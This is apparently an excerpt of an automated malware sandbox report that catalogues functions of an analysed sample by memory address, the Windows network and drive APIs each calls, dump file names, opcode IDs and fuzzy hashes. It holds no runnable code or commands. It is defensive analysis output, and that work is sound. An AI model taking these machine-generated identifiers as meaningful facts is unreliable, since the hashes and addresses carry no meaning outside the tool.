Instruction ID: 80d27c912cd0e1a3d2160b36dbac11b555114ed46ef83341c980cbedd1558e00
Opcode Fuzzy Hash: e39fe361fe3a193ecc78fc7f5fa5fea39d2e3c38bc7ba92ee01f182fb6e879a9
Instruction Fuzzy Hash: B16191EB14C311FDB39295856F149FB676EE6D2330730942EF803D2642E2960E4F55B1

Function 00EE4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32(00000000,00000040), ref: 00EE4AA5

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: gethostname
String ID:
API String ID: 144339138-0
Opcode ID: b3851987b645567431bff107330f92ffd57d6d74871825cf70e06557dd5f2097
Instruction ID: 99765a141d51fd895e5f08811e51ac0bbbaa452d9a5499b75393a7c4623f9f13
Opcode Fuzzy Hash: b3851987b645567431bff107330f92ffd57d6d74871825cf70e06557dd5f2097
Instruction Fuzzy Hash: E351E2F06043898BE7309F27DD4976376D4AF8531DF14283CE98AAA6D2E775E844DB02

Function 06E70BB0 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: f7fb9990231199132e7d8868e329a02c7c4cc91c5337fcf4867cf538835609a6
Instruction ID: a3dfe670d413b3ef356c8baefd93f33d0c45d554eba244d2385788d34fd4d8ad
Opcode Fuzzy Hash: f7fb9990231199132e7d8868e329a02c7c4cc91c5337fcf4867cf538835609a6
Instruction Fuzzy Hash: 532127EB54C312ADB3C381905B585FB2B2EFAD7236331A467F403DA106F2845A0A42F1

Function 06E70B7B Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 5cdd34c2d3bf0169870deab793929fbe17c23293d543c300867aad6aa2adb045
Instruction ID: b44b1d3530c64f12ea55a31ff3cf2ffb6f506d73497d76db5698295a6cdfc83b
Opcode Fuzzy Hash: 5cdd34c2d3bf0169870deab793929fbe17c23293d543c300867aad6aa2adb045
Instruction Fuzzy Hash: 9C114CEB54C311FDB3C1C4915B58AFB262EF6D6336331A432F803DA106F2945A4912F0

Function 06E70B92 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 1ace57867aadadc05579e9cc1213dc421ae71daa191d48aa96e2641c0665486e
Instruction ID: 42790221eee539fa745a2fba9c0f52e7bbdd893a12e5933949596b72f72e52a1
Opcode Fuzzy Hash: 1ace57867aadadc05579e9cc1213dc421ae71daa191d48aa96e2641c0665486e
Instruction Fuzzy Hash: 3211E5EB14C311BDB7C1D1815B14AFB272EB7D6232730A422B503DA106F2941A4915B0

Function 06E70BA1 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: b1f2cab75a2d33f79a92319bcf9cdd62703e6a44cfb49f1989d930969360b34e
Instruction ID: 8241e059cb6b4433359606a6779fdd0b4125bb2edc49751b04be37e14d5e431f
Opcode Fuzzy Hash: b1f2cab75a2d33f79a92319bcf9cdd62703e6a44cfb49f1989d930969360b34e
Instruction Fuzzy Hash: 0C01F5EB14C302BDB7C295815B54AFB272EF7D6236770A422B803DA606F3941A4E15B0

Function 06E70BDB Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 43cffc19fd2d87e38822496b84f9e1c32227e0d54db932e1bfd05d65b451288b
Instruction ID: e350d56ba057ab187f54f142f8c0929f3c418bfbdda148f1541e5e6b3bceaaad
Opcode Fuzzy Hash: 43cffc19fd2d87e38822496b84f9e1c32227e0d54db932e1bfd05d65b451288b
Instruction Fuzzy Hash: 8001F1FB50C312AEB385D59197516FB676ABAD6231770A036B403CB606F2A5464E1170

Function 06E70BFC Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 39f10fb342a1f71d6143aae39e6c0d8df259a60a106c12e1f36359c002e6827d
Instruction ID: ab29c507c7e5eb4bf46280240f255028fa00ff63492c838dda88d2d20f893d7d
Opcode Fuzzy Hash: 39f10fb342a1f71d6143aae39e6c0d8df259a60a106c12e1f36359c002e6827d
Instruction Fuzzy Hash: BCF0AFEB10C311BDB7C2D5816B646FA6B6EF7D6232770A432F803DA602E2A44A4E1171

Function 00EFAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 00EFAFD0

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: 2395bc8a54c253370014942deee30270c582c5583a195057373c831e239bf72b
Instruction ID: 9a8d58c8631886e1630daed1679203bb3e31b9bb0e94be356a26091b73898cd5
Opcode Fuzzy Hash: 2395bc8a54c253370014942deee30270c582c5583a195057373c831e239bf72b
Instruction Fuzzy Hash: 55119670808784D6EB268F18D8027F6B3F4EFD0328F109618E69956150F7325AC98BC2

Function 00EFA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,00000000,00000000,?), ref: 00EFA97E

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 105e8545b522675c892c485873102a175792f3aaf0edff9251a8410b0a0b2df8
Instruction ID: 04b0948c17d139ec85c47a4bbc23733fdd0cb5267d56616477df5565e9d7bacf
Opcode Fuzzy Hash: 105e8545b522675c892c485873102a175792f3aaf0edff9251a8410b0a0b2df8
Instruction Fuzzy Hash: 4601A7B57017149FC6148F15DC45B66B7A5EFC4720F0A8569EA982B361C331AC108BD1

Function 00EFAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00EFB280,00000000,-00000001,00000000,00EFB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00EFAF67

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 91e339357c0fc34aebd1378b802986cf8ef41d745e7df348f10fb7d8a19c64c6
Instruction ID: 498d37340b9e3d3a94319edf5b0baa98f934f9ba678370e50e6553453f7d9168
Opcode Fuzzy Hash: 91e339357c0fc34aebd1378b802986cf8ef41d745e7df348f10fb7d8a19c64c6
Instruction Fuzzy Hash: 45E0EDB6A093216BD654DA58E8449ABF369EFC4B20F055A59B9546B304C330AC508BE2

Function 00EFB020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?,00EF9422,?,?,?,?,?,?,?,?,?,?,?,w3,0130C880,00000000), ref: 00EFB04D

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 7ddf7ee2c3105317422daa9a02665534d90ec6a5abbf58c161a70b220bc13cdd
Instruction ID: 897836fe7a5752750f201fc15a77d89bd3701bcf48d7219dacce0bf8be994311
Opcode Fuzzy Hash: 7ddf7ee2c3105317422daa9a02665534d90ec6a5abbf58c161a70b220bc13cdd
Instruction Fuzzy Hash: 2ED0C238300201D7CA209A14C884A67722B7FC0314FA8DB68E12C4A150CB3BCC438601

Function 00E967E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,8004667E,?,?,00E6AF56,?,00000001), ref: 00E967FC

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 2188138c0b2dfdd0523fe9c0f914d96f94d8ea9a5dae586cdd830394fbeb83cc
Instruction ID: 5335767ea5ac199031c40fe1b5b74374b33508c8d32c8bbad6a2ae0802a3cfbb
Opcode Fuzzy Hash: 2188138c0b2dfdd0523fe9c0f914d96f94d8ea9a5dae586cdd830394fbeb83cc
Instruction Fuzzy Hash: 59C012F1118101AFC6088B14D855A6F76D8DB85355F01581CB04A81180EA345994CA1A

Function 00E331D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00E332E7

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b4986581fc93f7e0976bb02f8a944b7c063b158d35e1dd72ef47c0269e1ba11d
Instruction ID: 56f08c337d313f8c55615183dd7b12a9f7da2ac91e849412468cfdb9d99b1109
Opcode Fuzzy Hash: b4986581fc93f7e0976bb02f8a944b7c063b158d35e1dd72ef47c0269e1ba11d
Instruction Fuzzy Hash: DA31C2B49093159FCB10EFB8C58869EBBF4AF44348F00886DE898A7340E734DA44CF52

Function 06E60007 Relevance: .9, Instructions: 870COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f97bb0f78ca0eff79011ddfa6d941ca96fec14ccc41e1f186ffd916ef728eb
Instruction ID: 21cfa8ddd7f958c24b5ac8b591137b222e419e2ebda15c567e491cf3c13a5ab6
Opcode Fuzzy Hash: e3f97bb0f78ca0eff79011ddfa6d941ca96fec14ccc41e1f186ffd916ef728eb
Instruction Fuzzy Hash: D302D3EB1CC331BDB3D285876B54AFA6B6EE6D73B0B30A426F403D5542E2D40E8951B1

Function 06E60000 Relevance: .9, Instructions: 865COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a251fd97941b3ca4105906ed4da687985563933685854d4131a554a96a07dc3c
Instruction ID: 6ae2172da4fdef8bffcd42f30cebcc1c165a6baf6398cef3fe73c59acceaab34
Opcode Fuzzy Hash: a251fd97941b3ca4105906ed4da687985563933685854d4131a554a96a07dc3c
Instruction Fuzzy Hash: 2902D4EB1CC331BDB3D285876B54AFA6B6EE6D73B0B30A426F407D5542E2D40E8911B1

Function 06E60083 Relevance: .8, Instructions: 849COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c77ae84a9bf18ed80e447eed634e490a5a54d3bedf58b2dd77131b979ab1d4
Instruction ID: 6f3d54e28b7941db47d17e3497467add233c5662229a7acef820f683de7c29f0
Opcode Fuzzy Hash: 47c77ae84a9bf18ed80e447eed634e490a5a54d3bedf58b2dd77131b979ab1d4
Instruction Fuzzy Hash: E902D4E71CC331BDB3C285876B54AFA6B6EE6D73B0B30A426F407D5642E2D40E8951B1

Function 06E6003D Relevance: .8, Instructions: 842COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c25ded58a7cd2c6ac2af5cf9d156cc1b6b7520ab1472db23ddbb6a962d91a24a
Instruction ID: 87b0e70493be775d68ec04bcb80f128ff20b08a0f3d934a49e70634249ffb43e
Opcode Fuzzy Hash: c25ded58a7cd2c6ac2af5cf9d156cc1b6b7520ab1472db23ddbb6a962d91a24a
Instruction Fuzzy Hash: 9F02C3E71CC331BDB3D285876B54AFA6B6EE7D73B0B30A426F407D5642E2D40A8911B1

Function 06E60055 Relevance: .8, Instructions: 838COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1843321b8b2f3ce80b08159561c0def2e02e72a40a9efca3d345ecd9f3854e9e
Instruction ID: c0d18d3f57276d5b9b9b18fa61dc7c6fdc6dc5d22b51db805e80fbb6129bf7c2
Opcode Fuzzy Hash: 1843321b8b2f3ce80b08159561c0def2e02e72a40a9efca3d345ecd9f3854e9e
Instruction Fuzzy Hash: 9402D3E71CC331BDB3D285876B54AFA6B6EE6D73B0B30A426F407D5642E2D40E8911B1

Function 06E60070 Relevance: .8, Instructions: 828COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 533cf7198da8f595ebfcce335585f30572a4262a0d93cdeb564e87f5cc489718
Instruction ID: 255b011b43bfa027c545b723c35723a27611d3e048ce646b30abbcbb3c8e9c92
Opcode Fuzzy Hash: 533cf7198da8f595ebfcce335585f30572a4262a0d93cdeb564e87f5cc489718
Instruction Fuzzy Hash: C102D4E71CC331BDB3D281876B54BFA6B6EE6D73B0B30A426F407D5642E2D40A8915B1

Function 06E600A5 Relevance: .8, Instructions: 825COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72c9351a36cde12e312d22bd511eacdc9c919fc0d0cc2b0273a43b62012b4554
Instruction ID: 6254a4b857f12f4c285da9a9217441b4c0fcf79c75a8633da2207d75c769a7db
Opcode Fuzzy Hash: 72c9351a36cde12e312d22bd511eacdc9c919fc0d0cc2b0273a43b62012b4554
Instruction Fuzzy Hash: 9C02E5E71CC331BDB3C285876B54AFA6B6EE7D73B0B30A426F403D5642E2D40A8955B1

Function 06E600D9 Relevance: .8, Instructions: 820COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81a2d2bfe8c88de9554d1bae94a4e00cad1158a7ea6885e26a5bc8c1473f1219
Instruction ID: 66afdd9f2e7f79c21d9dff23c1c9f3db9ea1c1b7f52fd2c4e397fb3318530330
Opcode Fuzzy Hash: 81a2d2bfe8c88de9554d1bae94a4e00cad1158a7ea6885e26a5bc8c1473f1219
Instruction Fuzzy Hash: A802E4E71CC331BDB3C285836B54AFA6B6EE7D73B0B30A426F403D5642E2D40A8955B1

Function 06E600F7 Relevance: .8, Instructions: 802COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957d05eff88389a455f8c753296089af55f51f3c5c372384cdc78a1d05af330a
Instruction ID: cd810707b63fabc8ffdd8e995c9ab6891faa4be7e7752b7528f21e5776a5d3bb
